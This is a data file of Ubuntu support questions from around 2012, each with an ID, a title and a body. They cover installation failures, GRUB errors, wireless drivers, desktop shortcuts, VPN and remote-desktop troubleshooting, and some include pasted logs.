142094	how to install oracle 10g ee ?	i installed oracle 10g ( 10201_database_linux32.zip ) in ubuntu 10.10 . but now , i could not do this in ubuntu 12.04 . it is giving me an error message . hs_err_pid1918.log unexpected signal : 7 occurred at pc=0xb30e1dbc function=java.nio.bytebuffer.arrayoffset ( ) i ( compiled java code ) library= ( n/a ) current java thread : dynamic libraries : 08048000-08056000 r-xp 00000000 08:06 1048690 /media/sda6/oracle/product/10.2.0.1.0/oraibex/jdk/jre/bin/java 08056000-08059000 rwxp 0000d000 08:06 1048690 /media/sda6/oracle/product/10.2.0.1.0/oraibex/jdk/jre/bin/java 09140000-09890000 rwxp 00000000 00:00 0 [ heap ] a0fdd000-a0fe4000 r-xs 00000000 08:01 155998 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache a1167000-a1343000 r-xp 00000000 08:06 796416 /media/sda6/oracle/product/10.2.0.1.0/oraibex/lib/libnnz10.so a1343000-a1369000 rwxp 001dc000 08:06 796416 /media/sda6/oracle/product/10.2.0.1.0/oraibex/lib/libnnz10.so a136b000-
142097	installing another linux os	i have ubuntu with burg was installed and i intended to install backtrack to my computer . i 'm afraid , if i install backtrack , will it erase my burg-loader . how to recover this burg after installing backtrack ( without re-downloading burg ) .
142103	12.04 update problem	just got 12.04 , now i do n't have any icons for my folders and programs and i ca n't use my mouse . i 'm able to navigate using the keyboard , but when i open terminal it freezes . i tried to open the update manager but it wo n't install any updates . i have windows 7 as a second operating system , if this will help me at all .
142104	shell script to restart network-manager -- not from the terminal	my question may seem weird but it really makes sense if your internet connection keeps going off every few hours . i want to know how i can restart the network-manager by using a shell script . now i know that sudo service network-manager restart is how you do it in the terminal , but sadly that does n't work on a shell script . any ideas ?
142108	is it safe to change permissions for /usr/share folder ?	these days i mess around with files in /usr/share folder , like modify themes and other stuff ... so , is it safe to change permissions of /usr/share folder so i do n't have to open it as root every time i want to change something there ? or at least just /usr/share/themes folder ?
142112	printer dcp-165c with ubuntu 12.04 does n't work	i have ubuntu 12.04 version , and a brother dcp-165c printer . i have used the brother drivers for this printer . i can scan documents but i ca n't print them .
142115	how do i install gedit without zeitgeist ?	i do not like this zeitgeist thingy . because it is neither possible to ( easily ) configure it to shut up , nor is it possible to ( easily ) remove it without breaking other things . unfortunately , the useful editor `` gedit '' wo n't install without it . apparently it has a built-in zeitgeist plugin . so , my question is : is it possible to install gedit without this zeitgeist thing ? update : manual configuration is not what i 'm looking for - i have 30+ users ( remotely connected ) - should all users need to do this configuration tuning manually ? how does one start system settings from a remote terminal at all ? is it possible to disable this zeitgeist from one place for all users once and forever ?
142119	how can i assign the key super+m» to minimize all windows in ubuntu 12.04 ?	everytime i press super+m the dash lens for music appears . i have tried changing this behaviour using system tools ▸ keyboard ▸ shortcuts ▸ navigation ▸ hide all windows to assign super+m but it does not work . i have also tried using compizsetting to change the unity shortcuts , but it seems that the super+m shortcut is not defined here . any ideas ?
142120	how can i submit .crash files manually ?	what process can i use to submit .crash files that are n't submitted to ubuntu due to restrictions on my network ?
142123	merge unallocated disk space into ubuntu partition	trying to merge unallocated space 55.3 gb with ubuntu in ext4 ( 58.35gb ) to hopefully get a new partition with around 113 gb . having much difficulty . any help greatly appreciated . screenshot provided . many thanks !
142124	expect script : wait for completion	i 'm using an expect script to connect to a windows machine and execute an ant script . after completion i want to delete a file and log out . the execution of the ant script takes almost 30 seconds , so i added a `` sleep 40 '' to the expect script . but what if the execution time will be much longer ? is there a way to let the expect script wait without using the sleep command ?
142128	open windows in center of screen	i 'd like to have all of my windows open in the center of my screen instead of the top left corner . is this possible ? if so , where do i configure this ?
142131	how do i prevent dropbox from being automatically added to the autostart list after launching it ?	everytime i start dropbox ( in precise ) it gets added to the autostart list even if i deleted the entry before . i do n't want dropbox to be started when i log in only when i want it to . how to prevent dropbox to be automatically added to the autostart list ?
142132	install seems to hang , but i 'm not sure	i am trying to install ubuntu on an old computer that had windows xp on it . after struggling with why it would n't boot from the dvd , i ran across the solution where you typed help into the prompt and that worked for me . i took most of the defaults and chose to overwrite xp and only install ubuntu . it was painfully slow . i attribute that to booting from the dvd . at one point after i had answered all the questions and the bar at the bottom said `` copying files '' for quite a while , the install window simply disappeared . my mouse icon is still a swirly and has been for hours . the menu bar at the top of the screen is not functional so i ca n't even gracefully shutdown . if i do shut down with a control/alt/delete and try to start without the dvd , it hangs and never comes close to starting . i 've repeated these steps several times . what is going on ? ? ? ? thanks , dogulas
142133	can i get a workspace manager that shows a `` panner '' that i can manipulate ?	i 'm used to using workspace/desktop managers in windows like dexpot and sdesk that give me a `` panner '' or `` desktop preview '' that shows thumbnails of the windows in each desktop , and lets me click in a desktop to move to that desktop , or drag windows from within the panner/manager to move the actual window . i just installed ubuntu 12.04 , and i 'm finding that the default workspace manager seems pretty minimal . are there better options for a workspace manager , or is there a way to make the workspace manager more functional ?
142135	what happened to ctrl+alt+numpad in ubuntu 12 ?	i got used to using ctrl+alt+numpad to move windows around in ubuntu 11.04 . since i updated to ubuntu 12.04 , however , numpad shortcuts 4 , 6 , and 0 do n't work . those are the most important ones ! is there another set of shortcut keys for these operations , or is there a way to bring them back ?
142140	how do i make the unity launcher show up on the left hand screen ?	i use two monitors and the unity launcher appears on the right hand screen by default . how can i force the launcher to appear on the left hand screen ?
142143	ubuntu 12.04 install stalls with black screen	i 'm trying to install 12.04 from an install cd . i get to the initial screen asking if i want to try ubuntu , install ubuntu , or check the disc . if i choose install the screen goes black and that 's it . the cd spins for a few minutes and then stops and nothing else happens . any thoughts ? z75 , core i5 3550 , nvidia geforce gtx 550ti
142151	how do i change to gnome desktop - not unity ?	how do i change to gnome desktop - not unity ? i only have unity at present .
142152	is there any mechanism that blocks connections by ip address in a default 11.04 installation ?	on a default installation of 11.04 desktop ( running inside a vm ) , i 'm getting a strange phenomena in which occasionally some people ca n't ssh into their account in the regular way ( they simply get a `` connection timed out '' ) , but can connect if they change their external ip address ( e.g . use iphone tethering , or a socks proxy through some remote server . ) i suspect that it may be connected to several failed connection/authentication attempts that those people reported having a short time before this ip-blocking started for each of them . is there anything in 11.04 that auto-blocks ips for whatever reason ? if so , what is this and how can i release a block manually ? if not i guess i 'll have to investigate in the host machine and in the router ...
142159	desktop shortcut to create a new desktop shortcut does n't do anything	it 's weird that creating desktop shortcuts is currently so primitive . i found the following : create shortcut / launcher on desktop in ubuntu 12.04 that helps . however , if there 's something wrong with the shortcut , it just does n't do anything . for instance , i tried to create a shortcut for this command line to create a shortcut . when i double-click it , it just does nothing . this is the resulting text of my `` create desktop shortcut.desktop '' file on the desktop : [ desktop entry ] version=1.0 type=application terminal=false icon [ en_ca ] =gnome-panel-launcher exec=/usr/bin/gnome-desktop-item-edit ~/desktop/ -- create-new name [ en_ca ] =create desktop shortcut name=create desktop shortcut icon=gnome-panel-launcher as i said , when i double-click this , or right-click it and select open , nothing happens . is there a log file where something about this would be written to ?
142163	ubuntu freezing ( chrome runs out of memory ? )	my ubuntu 12.04 freezes when i open quite a few windows . i use it at work with a dual desktop , so i usually use about 10 different tabs in two different chrome applications . i assume chrome runs out of memory , or is it my small swap partition ?
142168	how to add applications and gui to the minimal ubuntu ?	i would like to build a custom ubuntu from the minimal ubuntu version . i plan to use the 11.10 version . my question is , how to i add the basic necessary packages like networking , desktop , apt-get , and all the basic stuff ? i wish to add only the free applications . also , please specify how to connect to internet using the command prompt and a grps mobile phone ?
142170	where is info for specific compiz settings , like `` clone output '' and `` window previews '' ?	i found several pages that talk about installing and running compiz , and a general overview of the sections contained within , but it 's difficult to find documentation on exactly what we 're editing in each node . for instance , there are fields labeled `` clone output '' and `` window previews '' , and i ca n't find any information about exactly what those do . is there a place where all of these fields are documented ?
142177	macbook pro boots with full screen brightness and keyboard backlight	i have dual-booted my macbook pro with ubuntu 12.04 . whenever i log-in to ubuntu , it does so with full screen brightness and keyboard backlight at full . how do i get rid of this ? how can i tweak the start-up setting for screen brightness and disable keyboard backlight at start-up ?
142179	how do i completely remove ubuntu 12.04 on my mac ?	i have dual booted ubuntu 12.04 on my mac using disk utility and the refit tool.the battery life is very bad and therefore i want to switch back to ubuntu 10.04 . how can i completely remove the 12.04 partition ?
142182	mac like multitouch support	i do n't remember how but in 11.10 i had managed to find a few multitouch actions to be supporetd by some software . now i am using 12.04 , is there any way/application/workaround/plugin or anything that can provide me with multitouch gestures similar to mac or atleast near to it ? with synaptics i figured out that my touchpad supports 3finger control . i am using a samsung np-rv509-a0gin .
142186	desktop does n't come up after installation	i installed ubuntu 12.04 64x with live usb as my cd rom is n't working . the live usb was made in windows ( no errors came while doing so ) . i then installed the 12.04 from usb with everything ok . in the end it asked for reboot i did that and removed usb too . upon reboot my system hangs on black screen with only a black '_ ' blinking . but when i put usb back in and then reboot , username / password login screen does come up but as soon as i login the whole system becomes unstable and i ca n't even see the unity launcher . i can create a folder but then it says some missing libs and whole system goes hung .
142192	can i install linux kernel in ubuntu appart of the default one ?	can we install the latest kernel 3.4 in kubuntu or ubuntu 12.04 lts ? if not then please clarify the reason .
142194	which torrent client has command line arguments to start/stop downloads ?	first of all , i want to create shell script to start/stop downloads in torrent client . i do n't need cli but if you know how i can do that with cli using shell script then it is okay . i use jdownloader which is gui based application but has some command line arguments as below which i use to start/stop download . -h/ -- help show this help message -a/ -- add-link ( s ) add links -co/ -- add-container ( s ) add containers -d/ -- start-download start download -d/ -- stop-download stop download -h/ -- hide do n't open linkgrabber when adding links -m/ -- minimize minimize download window -f/ -- focus get jd to foreground/focus -s/ -- show show jac prepared captchas -t/ -- train train a jac method -r/ -- reconnect perform a reconnect -c/ -- captcha < filepath or url > < method > get code from image using janticaptcha -p/ -- add-password ( s ) add passwords -n -- new-instance force new instance if another jd is running so i can easily start/stop download as follows , jdownloader -- start-download jdownloader -- stop-download now i want torrent client to do that through shell script .
142198	how can i change nautilus background to a dark color ?	i 'd like to know if it was possible to change the background of nautilus to a dark color . any ideas ?
142207	find : unknown predicate	this is probably not a ubuntu question as such , but a linux one instead , still hope some linux user out there can help me understand this . i 'm trying to use the find command to look for some files an a directory tree . unfortunately some of the files are named beginning with a dash , like -000.jpg , -002.jpg , 00n.jpg and so on . however , every time that the command locates one of the files named that way , it just interrupts the process and complains in the following way : find : unknown predicate `-001.jpg' or whatever the file beginning with a dash is named . it seems to me that somehow the find command is interpreting the resulting filename as an argument , but i have n't found a way to circumvent this behavior . thanks in advance for sharing your wisdom .
142213	ubuntu 12.04 ( server ) : failed to load fallback graphics devices ?	i 've installed ubuntu 12.04 ( server , x64 ) under esxi 5.0 and it appears to be working fine , but when it boots i get the following message : * starting load fallback graphics devices [ fail ] everything seems to be working fine but the error message is bothering me . the server is headless ( ie . running as a virtual machine ) . anybody know anything about this message ? can it be fixed ? ( there appears to be another unanswered question the same as mine : `` load fallback graphics devices '' problem )
142216	ca n't log in to lubuntu 12.04 x server	as of rebooting yesterday i ca n't login as myself to the x server part of 64-bit lubuntu 12.04 . same problem as can not get passed the login screen but that solution did n't work for me . troubleshooting steps i already took : i can log in as guest ( with whatever window manager ) to the graphic ( x ) view of lubuntu . log in as myself into a virtual terminal . ( in fact i 'm writing this from w3m for that reason . ) so i know my password is correct and that most aspects of the system are working . one of the top google results for `` ca n't log into lubuntu '' mentioned a disk-full problem on netbooks ; i do n't have that problem . let me know if i need to paste any messages or config files to make this question clearer and i 'll do so . $ ls -l /home total 12 drwxr-xr-x 99 me me 12288 may 26 14:16 me $ ls -ld /tmp drwxrwxrwt 16 root root 4096 may 26 15:46 /tmp
142218	where did my session indicator go after upgrading to 12.04 ?	after upgrading to 12.04 from 11.10 , session indicator in the top-right corner is gone . i ca n't access user settings or other menus .
142223	wireless not working in wubi install ?	i just installed ubuntu with wubi and it never gave me the screen suggested in the installation steps to connect to the internet . now i can not detect any kind of internet .
142228	x11vnc error : `` the program `` xvfb '' could not be found . ''	lately i 've been accessing an ubuntu machine over the internet . i 'd been connecting and starting an x11vnc server using the following command ssh me @ my.computer -p 2222 -l 5903 : localhost:5900 `` x11vnc -display :0 -noxdamage - create -usepw -once '' and then i 'd open localhost:5903 in my macbook 's native screen sharing program . this had all been working fine for several days , until just now , after i upgraded ubuntu . now the command fails with the following error : the program `` xvfb '' could not be found in path and standard locations . you probably need to install a package that provides the `` xvfb '' program . without it findcreatedisplay mode may not be able to create an x display . 25/05/2012 15:53:39 wait_for_client : find display cmd failed . 25/05/2012 15:53:39 wait_for_client : findcreatedisplay cmd : /bin/sh /tmp/x11vnc-find_display.jxgwux xvfb trying n=20 ... the program `` xvfb '' could not be found in path and standard locations . you probably need to install a package that provides the `` xvfb '' program . 25/05/2012 15:53:39 wait_for_client : read failed : /bin/sh /tmp/x11vnc-find_display.jxgwux xvfb 25/05/2012 15:53:39 fgets : bad file descriptor does anyone know what 's happened and how to fix it ?
142244	can i get a window to be active and not on top ?	in previous desktops , i could always configure windows to be active when the cursor was on the window , and not having to bring it to the front to be active . it is not apparent to me how to do that in ubuntu 12.04 desktop .
142246	ubuntu 11.10 - computer with no hdd	i 'm new to linux and ubuntu [ less than a month using ubuntu 11.10 ] . this old machine i have : amd athlon x2 64 , 4gb ram no hdd no cd/dvd drive usb pen 4gb with live cd [ ubuntu 11.10 i386 ] usb pen 8gb -- - intended as hdd sd card 2gb -- - with ubuntu 11.10 i386 iso file fast internet 25 mib/s what im trying to do is : start computer with 4gb pen ubuntu 11.10 install ubuntu in 8gb pen [ not create a live cd ] work from the 8gb pen with ubuntu installed in it . is this possible ? if so , any tips how i go to do this ?
142247	why does n't right-click work on my desktop ?	i installed elementary os and e17 on my ubuntu 12.04 from ppas . after logout and login , right click on desktop is not working in gnome and unity but working in file manger.when i login into pantheon session , i do n't find an option to open home folder and my login display manager theme is also changed.i want to get back to default ubuntu login theme.can i change the login theme with simple-lightdm manager . i dont want to mess up my system.please hemp me how to fix these .
142248	why ca n't i set the correct icon for my launcher ?	i created a launcher for eclipse ( sts , actually ) . when i double-click it , it starts up eclipse . what 's annoying is that the icon is the gnome footprint with the left-pointing arrow . i 'd like to set it to use the icon that came with sts . i edited ~/desktop/eclipse.desktop and commented out the icon line and replaced it with this ( where `` '' is the path to my homedir ) : icon [ en_ca ] =/apps/springsource/sts-2.9.1.release/icon.xpm i restarted the box , but the icon did n't change . i verified that the path i entered is the path to the xpm file .
142249	apps simply hide upon switching apps with alt+tab	after upgrading to 12.04 and being on unity , i am having this strange problem . say i have opened a few apps , e.g. , chrome , gnucash , gimp , etc. , and i am presently working on gnucash . when i press alt+tab to switch some other app , the app i was working on , e.g. , gnucash simply hides somewhere and i can not find it where it is . however , in system monitor , it still shows up . can someone help me figure out where these apps are getting hidden upon switching to other app .
142253	more print to file settings ?	the settings in print to file option in ubuntu is limiting and dangerous . all the applications apart from mozilla print to a file ~/output.pdf , this is dangerous as you can overwrite a previous print . edit : i have been informed you are asked whether you wish to overwrite , unlike in cups-pdf why ca n't applications use the title of the document , the filename or the page title of the web page ? what package and where are the settings of this print to file held . i would prefer it printing to the desktop if it can not intuitively chose a filename , as when it arrives on the desktop it would be a visual reminder for me to change the filename . previously i did not use the print to file feature , as the cups-pdf did n't have these short comings . but the latest releases including 12.04 of cups-pdf has been botched and all text are converted to images before embedding them in the pdf . making the pdfs useless as it prevents the selecting of text and the sharpness of the text is lost too . the bug has been reported for sometime now , https : //bugs.launchpad.net/ubuntu/+source/cups-pdf/+bug/820820 and as usual been labelled as a wish list feature . so my question is where in the system is the ~/output.pdf set ? so one can change it to the desktop .
142255	how to configure ubuntu 12.04 as a vpn server that allows connections from os x and ios ?	i am trying to setup a vpn using pptp and connect using iphone ( ios ) but it fails . may 25 22:43:38 zork pptpd [ 28793 ] : ctrl : client x.x.x.x control connection finished may 25 22:44:02 zork pptpd [ 28810 ] : mgr : connections limit ( 100 ) reached , extra ip addresses ignored may 25 22:44:02 zork pptpd [ 28811 ] : mgr : manager process started may 25 22:44:02 zork pptpd [ 28811 ] : mgr : maximum of 100 connections available may 25 22:44:08 zork pptpd [ 28812 ] : ctrl : client x.x.x.x control connection started may 25 22:44:09 zork pptpd [ 28812 ] : ctrl : starting call ( launching pppd , opening gre ) may 25 22:44:09 zork pppd [ 28813 ] : plugin /usr/lib/pptpd/pptpd-logwtmp.so loaded . may 25 22:44:09 zork pppd [ 28813 ] : pppd 2.4.5 started by root , uid 0 may 25 22:44:09 zork pppd [ 28813 ] : using interface ppp0 may 25 22:44:09 zork pppd [ 28813 ] : connect : ppp0 /dev/pts/5 may 25 22:44:09 zork pptpd [ 28812 ] : gre : bad checksum from pppd .
142258	how do i revoke a pgp key ?	note : this is a purely hypothetical situation . suppose that i had created a pgp key , pushed it to the ubuntu keyserver ( hkp : //keyserver.ubuntu.com ) , and added it to my launchpad account . further suppose that my pgp key was compromised somehow . apart from removing the key from launchpad , what steps do i need to take ?
142259	wubi install fails quietly when checking for ubuntu isos	i am trying to install ubuntu 12.04 using wubi installer but i have a big problem , never happend before . i am running the wubi installer i say yes on security notification is shows how is loading for a few seconds , and then the loading animation dissapear , and nothing happens . i tried to mount the ubuntu iso , but no succes again . any help would be very appreciated . thanks a lot ! 05-26 01:30 debug commonbackend : searching isos on usb devices 05-26 01:30 debug distro : checking ubuntu iso e : \nfsug2_disk2.iso 05-26 01:30 error windowsbackend : error executing command > > command=c : \users\toxdes~1\appdata\local\temp\pyleb12.tmp\bin\7z.exe l e : \nfsug2_disk2.iso > > retval=2 > > stderr= error : e : \nfsug2_disk2.iso : can not open file as archive 05-26 01:30 debug distro : does not contain casper\filesystem.squashfs 05-26 01:30 debug distro : checking ubuntu iso e : \nfsug2_disk2.iso 05-26 01:30 error root : iteration over non-sequence traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 57 , in run file `` \lib\wubi\backends\common\backend.py '' , line 190 , in fetch_basic_info file `` \lib\wubi\backends\common\backend.py '' , line 803 , in find_any_iso file `` \lib\wubi\backends\common\distro.py '' , line 113 , in is_valid_iso typeerror : iteration over non-sequence
142268	how to restore scroll wheel functionality in abiword ?	ever since i upgraded to lubuntu 12.04 ( from lubuntu 11.10 ) , the scroll wheel on my mouse has not worked in abiword for moving up and down in documents . the scroll wheel does still work in other applications i 've tried -- for example , it works in firefox , chromium , lxterminal , xchat , pidgin , gedit , leafpad , and libreoffice writer . how can i restore mouse wheel scrolling in abiword ?
142275	why does n't evolution use the login keychain ?	i use evolution as an email client but it 's annoying in that it does n't use the 'login ' keychain . every time i log in there 's a pop asking for the password to keychian 'default ' which is the one evolution creates . is there any way to fix this ?
142276	new install 1204 error `` out of range '' black screen with cursor and dead	installed first time with windows 7 - on reboot got error `` out of range '' black screen with cursor and dead . installed again and wiped windows 7 off and still get same message . will not reboot or respond in any way . runs real good from cd but not installation . help !
142278	lubuntu 11.10 wifi flickering on & off	the wifi on my computer was running fine after i installed lubuntu 11.10 , skip ahead a month or two and i started to get problems with my wifi just turning off then back on with no notice when my computer was unplugged . a few weeks later , now this problem happens even when plugged in . sometimes it happens right after i turn on my computer , sometimes not right away . it is starting to get difficult to deal with ... if it helps , i never had this problem with ubuntu 11.10 ( with the same computer ) my computer is a toshiba l505
142283	unable to boot ubuntu 12.04 installer on usb pendrive created with universal usb installer .	i tried to install ubuntu 12.04 lts using an hp pendrive . i made the pendrive bootable with the universal usb installer v1.8.9.7 . i was not able to boot from the pendrive . can you tell me why this is happening ?
142289	download and update impossible .	i use the update center and the ubuntu software center , they worked fine until i installed an update and then i hit `` check '' in the update manager and it goes through in 2 seconds and says all downloads failed . the software center i click on the `` more info '' button and it says ( where it should say install ) '' add source '' i have internet access but it doesnt even give me an error notice , i can download anything from the software center , and there hasnt been an update for over 15 days , with checking . i have tried updating through terminal , but there is something wrong with the entire download and update process . seems i cant download anything at all now .
142290	how to install a cli-only system offline ?	i would like to install a cli-only version of the latest ubuntu ( currently 12.04 ) , with as few packages as possible . ( note : i am not looking for stripping down a gui system -- i want to add the components i need , not remove the components i do n't need . ) which image do i need to download , and how do i proceed to install from that image , assuming i do not have a network connection during installation ?
142293	different grub files to edit	i 've been looking around to solve a black screen problem and found some pages with a very similar solution but each one using different grub files to edit . for instance i 've found examples using grub here /etc/default/grub and here /boot/grub/grub.cfg . what is the difference between them and which one should i edit ?
142300	fixing grub error : `` error : unknown filesystem ''	when booting into ubuntu , i 'm getting the following error with a grub rescue shell following it : error : unknown filesystem . grub rescue > i 'm not exactly sure what i did . i believe i installed ubuntu over windows on my acer netbook . i then tried to install linux mint , but it would n't start installing . i turned the netbook off and back on . now i get the error . i have read a lot of other questions like this , but in my case i can not boot a cd . if i put a ubuntu cd or a linux mint cd into my external cd/dvd drive and change my bios to boot the cd-rom first , it just gives me the same error screen . here are some results from using the ls command : grub rescue > ls ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos1 ) grub rescue > ls ( hd0 , msdos5 ) unknown filesystem grub rescue > ls ( hd0 , msdos1 ) unknown filesystem grub rescue > ls ( hd0 ) unknown filesystem can anyone get me back into ubuntu and make this error go away ?
142310	little sound comes out of my audio output jack .	i am running ubuntu 12.04 on a dell inspiron 17r . i believe this is a known bug , '' https : //bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/994685 '' , but i may be wrong . any help is appreciated .
142311	plexmediaserver not running	i had plexmediaserver ( pms from here on ) installed on my ubuntu machine , recently i switched from sshfs to nfs for my network shares , pms managed to stream perfectly from my network shares when i was on sshfs , but it stopped working as i enabled and used nfs . ( mind you library updates still happened successfully ) i thought it was a pms issue so i thought lets remove it completely and reinstall again , so i removed pms and removed the /var/lib/plexmediaserver folder now i installed pms again but it wo n't run i noticed it is unable to create the /usr/lib/plexmediaserver folder as it doesnt exist also i can see that i can not stop the pms server and every time i run it it runs with a diff pid ubuntu @ ubuntu : ~ $ sudo service plexmediaserver stop [ sudo ] password for ubuntu : stop : unknown instance : ubuntu @ ubuntu : ~ $ sudo service plexmediaserver start plexmediaserver start/running , process 3935 ubuntu @ ubuntu : ~ $ sudo service plexmediaserver start start : job is already running : plexmediaserver ubuntu @ ubuntu : ~ $ sudo service plexmediaserver start plexmediaserver start/running , process 4009 ubuntu @ ubuntu : ~ $ sudo service plexmediaserver start plexmediaserver start/running , process 4079 ubuntu @ ubuntu : ~ $ sudo service plexmediaserver start plexmediaserver start/running , process 4149 ubuntu @ ubuntu : ~ $ sudo service plexmediaserver start start : job is already running : plexmediaserver ubuntu @ ubuntu : ~ $ sudo service plexmediaserver start plexmediaserver start/running , process 4223 ubuntu @ ubuntu : ~ $ sudo service plexmediaserver start start : job is already running : plexmediaserver ubuntu @ ubuntu : ~ $ sudo service plexmediaserver start start : job is already running : plexmediaserver ubuntu @ ubuntu : ~ $ ubuntu @ ubuntu : ~ $ edit : running ubuntu 64 bit 12.04 lts with pms beta
142316	compiling c++ inside a folder in ubuntu 12.04	i have some question about compiling .cpp inside a folder , it says first.cpp no such file or directory but when i run it in home it compiles . any settings i might have left out ? thanks . here 's the terminal output ( view it bigger ) : law @ ubuntu : ~ $ ls android-sdk downloads pictures test wallpapers android-sdks eclipse public tomcat workspace desktop examples.desktop sourcecodescpp ubuntu one documents music templates videos law @ ubuntu : ~ $ dir sourcecodescpp first.cpp law @ ubuntu : ~ $ g++ first.cpp g++ : error : first.cpp : no such file or directory g++ : fatal error : no input files compilation terminated . law @ ubuntu : ~ $ ./a/out bash : ./a/out : no such file or directory law @ ubuntu : ~ $ ls android-sdk downloads pictures test wallpapers android-sdks eclipse public tomcat workspace desktop examples.desktop sourcecodescpp ubuntu one documents music templates videos law @ ubuntu : ~ $ dir ls dir : can not access ls : no such file or directory law @ ubuntu : ~ $ ls android-sdk downloads music templates videos android-sdks eclipse pictures test wallpapers desktop examples.desktop public tomcat workspace documents first.cpp sourcecodescpp ubuntu one law @ ubuntu : ~ $ g++ first.cpp law @ ubuntu : ~ $ ./a.out hello world ! law @ ubuntu : ~ $ ^c law @ ubuntu : ~ $ ^c law @ ubuntu : ~ $
142317	do i need to create a partition to install ubuntu inside windows ?	do i need to create a partition when i install ubuntu with the windows installer ? the installation steps do not say anything about this .
142327	can not access internet ( dns names do not resolve ) after update today	i have been using precise for a few weeks now for work with no problem . today , i am not able to access any website using either wired or wireless connections . i installed the updates today which included nautilus , xserver , and a new kernel ( 3.2.0-24 ) . after restarting i no longer was able to browse the internet using firefox or chrome . trying to ping google in terminal gives ping : unknown host google.ca i have tried : connecting to wireless or wired networks ( both working on other machines ) restart the machine and boot with previous kernel manually configure opendns on my wired connection restart the network and the laptop and the wireless card without any success so far . i am not sure where to go next . please let me know the cause of the issue or help me troubleshoot it . note that the laptop does receive an ip address , and it can ping ip address of google.ca ( 74.125.127.94 ) but not the domain name , or any domain name for that matter . this system was upgraded from 11.10 to 12.04 more two weeks ago .
142330	recommendations for application in ubuntu software center	ubuntu software center can not receive recommendations i am trying to turn on recommendations but its automatically turned off ...
142331	how to change tty resolution after boot ?	how do i change the tty resolution after the system has already booted ?
142334	unable to install ubuntu on my computer . black and white static appear	i 've been trying to install ubuntu 12.04 on my computer for some time now . it works on my laptop , but wo n't install on my desktop . i 've also tried installing 11.04 , and the same problem occurs . the purple screen comes up , the orange dots load , then the screen turn into to a black and white checkerboard , and nothing else happens . i believe the issue has to do with my nvidia graphics card , as i have heard it can cause issues for ubuntu . i am booting from a usb drive . any suggestions ?
142335	what dvd authoring software can i use on ubuntu 12.04 lts ?	i have ubuntu 12.04 lts 64-bit . i 'm looking for a dvd maker program for ubuntu like the dvd maker program for windows . i need to put some videos on dvd ( and in dvd format , not just as files ) so i can clean up some space on my pc . what can i use to do this ?
142336	how do i connect to available networks from the command-line ?	more accurately , how do i tell ubuntu to obtain an address using dhcp for all the network interfaces it finds ( which do not require a password ) ?
142340	how to recover data from formatted swap ?	i am using ubuntu 12.04 . i have 4 partitions of hard disk . 1st of 43 gb contains windows 7 , 2nd ( 43 gb ) and 3rd ( 32 gb ) contained valuable data and 4th of 42gb contains ubuntu . now , while installing ubuntu 12.04 , by mistake i made whole 32gb hard disk swap . now i am unable to access that data neither from windows nor from ubuntu . so i installed gparted and formatted that disk to fat32 ( which was a horrible mistake from my side ) . now i used a recovery software from windows to recover the lost data but to no avail . i thought may be the disk is in fat that is why i am unable to recover . so i formatted it again into ntfs . but all the same i am unable to get my precious data back .
142341	unity 3d not working	the first time i installed ubuntu 11.04 , it said that my computer ca n't run unity 3d . now i upgraded my computer a little bit , and i want to try to enable unity 3d again , but i do n't know how . i 'm using unity 2d , if it helps out telling me how to fix it .
142348	broadcom bcm4331 can not connect to wpa networks	i installed ubuntu 12.04 on my early-2011 macbook pro . i installed the broadcom wireless driver and i can not connect to wpa secured networks . how do i fix this ?
142350	fn+f6 & f7 does not work for screen brightness in 12.04	i am using toshiba portege r835-p70 and function keys work as expected on windows but they do not on ubuntu 12.04 . for e.g . fn+f6 and fn+f7 are supposed to change screen brightness but do not work . what is the solution for this issue ? i tried adding grub_cmdline_linux_default=âquiet splash acpi_backlight=vendorâ to /etc/default/grub , but it introduces an additional problem in that the laptop wakes up to a faintly visible dark screen from hibernation . i know this is an old issue , but if it is so common , why is n't there a simple solution to it and why is n't it incorporated in latest versions of ubuntu ? thanks .
142352	netbeans 7.0.1 not opening	i am working in netbeans on ubuntu for the last 4 months . but today when i opened netbeans , it just got stuck in the ubuntu launcher bar at the left side of screen . i have my project pending in netbeans ( which is not opening ) . i am stuck in this problem . i also rebooted ubuntu a number of times , still the same . i ca n't open netbeans . why is this happening ? what is the cause of this problem ? what should i do ? tried $ gksu netbeans , nothing happens , $ prompt shown again .
142354	is there a gui to edit the path variable ?	there 's a gui in windows to edit the path variable . i was wondering if there 's something equivalent in ubuntu to do the same .
142357	how to boot into the command line ?	how can you boot directly into the command line with kubuntu ? i 've tried searching on google but all i can find is related to ubuntu .
142360	finding stations for rhythmbox	i can google for stations i 'd like to listen to , but i ca n't find the correct url to put into rhythmbox for them to work . do i need to find stations that offer a specific kind of protocol ? i.e . `` pls '' ( playlist ? ) where are some top-notch places to find stations ?
142372	how do i remove gnome-panel settings ?	my gnome-panel settings have gone crazy . i now have three bars at the top and three bars at the bottom , leaving limited space for working with . is there a way to remove all gnome-panels settings ? i just want to nuke everything and start over . this is what it looks like at the moment : http : //imgur.com/do0ha
142375	how do i package a python app for ppa ?	i am planning to package fbuntu into ppa for easier distribution . the nature of this app is that the user has to make specific edits to the auth.py file to make it work and hence i am stuck from proceeding any further . a default first couple of lines of auth.py looks like this : import facebook class facebookauthentication : def __init__ ( self ) : url = `` https : // ... '' self.parse_url ( url ) the user after branching fbuntu from the bazaar , has to manually edit the url with the one you get after authenticating with facebook . i have no idea on how to make an app be edited after a deb package has been generated . any guidance on how to proceed with packaging this would be welcome .
142378	dual-monitor ( twinview ) vertical , rotated display : how to make mouse span horizontally ?	in a dual-monitor configuration ( i happen to employing nvidia , but not sure it matters ) , want to both : display each monitor vertically , in `` portrait '' mode ( rotated , with xrandr ( 1 ) ) , and make mouse movement/transition span horizontally between the monitors . by `` default '' in vertically-rotated config , the mouse spans between monitors only from bottom of one monitor and top of the other . extremely annoying , almost unusable .
142379	unable to use wpa security when using laptop as hotspot with an intel 3945abg	when i use my laptop running ubuntu 12.04 as hotspot , i am only allowed to use wep security instead of wpa . i dual boot ubuntu with windows on this laptop and when i use windows to create the hotspot i am allowed to use wpa security so it is not a hardware issue . i use intel pro/wireless 3945abg wireless connection .
